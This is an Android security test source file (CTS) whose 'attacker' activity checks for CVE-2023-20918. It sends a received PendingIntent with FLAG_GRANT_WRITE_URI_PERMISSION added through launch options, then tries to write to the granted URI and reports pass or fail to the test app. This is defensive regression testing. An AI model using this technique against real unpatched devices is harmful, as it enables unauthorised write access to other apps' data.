1 /* 2 * Copyright (C) 2022 The Android Open Source Project 3 * 4 * Licensed under the Apache License, Version 2.0 (the "License"); 5 * you may not use this file except in compliance with the License. 6 * You may obtain a copy of the License at 7 * 8 * http://www.apache.org/licenses/LICENSE-2.0 9 * 10 * Unless required by applicable law or agreed to in writing, software 11 * distributed under the License is distributed on an "AS IS" BASIS, 12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 * See the License for the specific language governing permissions and 14 * limitations under the License. 15 */ 16 17 package android.security.cts.CVE_2023_20918_attacker; 18 19 import android.app.Activity; 20 import android.app.ActivityOptions; 21 import android.app.PendingIntent; 22 import android.content.Intent; 23 import android.net.Uri; 24 import android.os.Bundle; 25 26 public class ExploitActivity extends Activity { 27 28 @Override onCreate(Bundle savedInstanceState)29 protected void onCreate(Bundle savedInstanceState) { 30 try { 31 super.onCreate(savedInstanceState); 32 Intent intent = getIntent(); 33 final String keyPendingIntent = getString(R.string.keyPendingIntent); 34 35 // If intent contains 'keyPendingIntent', then this activity is launched again using 36 // the custom intent that the extra 'keyPendingIntent' holds. 37 if (intent.hasExtra(keyPendingIntent)) { 38 PendingIntent activity = intent.getParcelableExtra(keyPendingIntent); 39 ActivityOptions options = ActivityOptions.makeBasic(); 40 options.setPendingIntentLaunchFlags(Intent.FLAG_GRANT_WRITE_URI_PERMISSION); 41 activity.send(this, 0, null, null, null, "", options.toBundle()); 42 } else if (intent.getData() != null) { 43 // Control goes in this block when the activity is launched again. Attempting to 44 // open uri data received from the intent. 45 Uri data = intent.getData(); 46 getContentResolver().openOutputStream(data); 47 48 // If control reaches here, then it means that openOutputStream() did not raise an 49 // exception, this indicates that FLAG_GRANT_WRITE_URI_PERMISSION has been granted 50 // so sending a broadcast to DeviceTest with the test_fail status. 51 sendBroadcastToTestApp(getString(R.string.bcastActionTestFail)); 52 } 53 } catch (Exception e) { 54 if (e instanceof SecurityException 55 && e.getMessage().contains(getString(R.string.keyPendingIntent))) { 56 // ignoring this exception since it occurs with fix 57 sendBroadcastToTestApp(getString(R.string.bcastActionTestPass)); 58 return; 59 } 60 61 // Sending a broadcast to DeviceTest to indicate assumption failure status, 62 // since an exception was raised unrelated to the vulnerability 63 sendBroadcastToTestApp(getString(R.string.bcastActionTestAssumeFail), 64 getString(R.string.expActivityExploit, e.getMessage())); 65 } 66 } 67 sendBroadcastToTestApp(String action)68 public void sendBroadcastToTestApp(String action) { 69 sendBroadcastToTestApp(action, null); 70 } 71 sendBroadcastToTestApp(String action, String assumeFailMsg)72 public void sendBroadcastToTestApp(String action, String assumeFailMsg) { 73 try { 74 Intent intent = new Intent(action); 75 if (assumeFailMsg != null) { 76 intent.putExtra(getString(R.string.keyMsgAssumeFail), assumeFailMsg); 77 } 78 sendBroadcast(intent); 79 } catch (Exception ignored) { 80 // ignore the exceptions 81 } 82 } 83 } 84